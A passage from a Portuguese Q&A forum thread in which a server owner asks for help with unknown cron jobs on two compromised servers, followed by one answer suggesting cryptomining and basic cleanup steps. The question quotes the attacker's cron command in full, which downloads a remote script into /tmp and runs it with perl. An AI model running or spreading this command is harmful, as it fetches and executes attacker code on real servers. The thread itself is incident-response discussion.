Eu tenho dois servidores dedicados que há alguns dias começaram a me enviar notificações sobre cron jobs desconhecidos em execução.
Em ambos os servidores, tenho contas secundárias para meus sites e o hacker modificou o cron job para essas contas, não para root. Então eu acho que "talvez" eles tenham acesso limitado.
Ambos estão tentando executar o seguinte: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Ohttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
Saída do cronjob do primeiro servidor:
http://pastebin.com/m56ga6pp
Saída do cronjob do segundo servidor:
http://pastebin.com/4utZ8agC
O estranho é que os dois servidores parecem hackeados ao mesmo tempo e usando o mesmo método.
Alguém teve exatamente esse tipo de hack que pode me dar ideias de como ele entrou e se posso removê-lo sem reinstalar ..?
Existem muitos sites nos servidores, e o primeiro usa cerca de 500 GB, o que levaria muito tempo para ser movido para outro lugar e reinstalado.
Desde já, obrigado!
Responder1
Olhando para a saída do pastebin, parece que os cron jobs estão tentando gerar hashes. Suspeito que a pessoa está tentando usar o servidor como parte de um pool de mineração para uma criptomoeda.
Para obter detalhes sobre como ele entrou, precisaríamos de vários registros e você tem 100% de certeza de que não foi o proprietário do site quem fez isso? Você pode remover facilmente o cronjob com.
crontab -e
Para evitar que a pessoa volte, eu desabilitaria o acesso ao shell para o usuário específico se não houver razão para que ele o tenha.
chsh -s /sbin/nologin {username}